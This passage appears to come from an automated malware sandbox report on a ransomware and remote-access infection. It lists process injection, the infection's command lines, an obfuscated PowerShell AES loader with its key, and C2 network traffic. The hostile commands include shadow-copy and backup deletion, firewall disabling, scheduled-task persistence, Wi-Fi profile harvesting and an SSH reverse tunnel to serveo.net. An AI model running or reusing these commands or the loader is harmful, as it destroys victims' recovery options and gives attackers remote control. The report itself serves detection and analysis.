Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B496.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EE27.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ECAF.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1592 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 1592 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 444 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 3916 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe
PID 4796 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 4184 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe
PID 2036 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Windows\system32\cmd.exe
PID 2036 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 4400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 912 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1288 wrote to memory of 4852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 912 wrote to memory of 3916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 912 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 912 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 912 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3164 wrote to memory of 3880 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\B188.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\rh111.exe

"C:\Users\Admin\AppData\Local\Temp\rh111.exe"

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

"C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe"

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

"C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe"

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

"C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe"

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B188.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

"C:\Users\Admin\AppData\Local\Temp\B496.exe"

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\EE27.exe

C:\Users\Admin\AppData\Local\Temp\EE27.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

"C:\Users\Admin\AppData\Local\Temp\B496.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\B496.exe

"C:\Users\Admin\AppData\Local\Temp\B496.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Update.bat" "

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "ECAF" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\ECAF.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe -debug

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "ECAF" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe"

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.dll",run

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Update.bat" "

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8827 serveo.net

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

C:\Users\Admin\AppData\Local\Temp\Update.bat.exe

"Update.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function ZqQQq($yrdIB){ $IjGLg=[System.Security.Cryptography.Aes]::Create(); $IjGLg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $IjGLg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $IjGLg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtEhSjk9/xTX7PlkU7WEq/tt3cb4ulKRYz+R+dnKvS4='); $IjGLg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V8mgOU0mNIV7j5K8gN4tUw=='); $lGSGI=$IjGLg.CreateDecryptor(); $return_var=$lGSGI.TransformFinalBlock($yrdIB, 0, $yrdIB.Length); $lGSGI.Dispose(); $IjGLg.Dispose(); $return_var;}function FKpZl($yrdIB){ $lUttd=New-Object System.IO.MemoryStream(,$yrdIB); $rSgqr=New-Object System.IO.MemoryStream; $xdyrL=New-Object System.IO.Compression.GZipStream($lUttd, [IO.Compression.CompressionMode]::Decompress); $xdyrL.CopyTo($rSgqr); $xdyrL.Dispose(); $lUttd.Dispose(); $rSgqr.Dispose(); $rSgqr.ToArray();}function YQlbE($yrdIB,$fOvUv){ $VnPHF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yrdIB); $eARGx=$VnPHF.EntryPoint; $eARGx.Invoke($null, $fOvUv);}$HYPPN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($Bivrj in $HYPPN) { if ($Bivrj.StartsWith('SEROXEN')) { $MGcDG=$Bivrj.Substring(7); break; }}$LdMVF=[string[]]$MGcDG.Split('\');$ZOxOl=FKpZl (ZqQQq ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($LdMVF[0])));$JHDWe=FKpZl (ZqQQq ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($LdMVF[1])));YQlbE $JHDWe (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));YQlbE $ZOxOl (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 amxt25.xyz udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 126.178.238.8.in-addr.arpa udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 servermlogs27.xyz udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 120.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 xemtex534.xyz udp
DE 212.87.212.222:80 xemtex534.xyz tcp
US 8.8.8.8:53 222.212.87.212.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 cdn1.frocdn.ch udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 180.194.10.204.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 136.243.104.242:443 tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 242.104.243.136.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 136.243.18.118:443 www.ammyy.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 github.com udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 140.82.114.3:443 github.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 3.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 serveo.net udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 138.68.79.95:22 serveo.net tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 95.79.68.138.in-addr.arpa udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
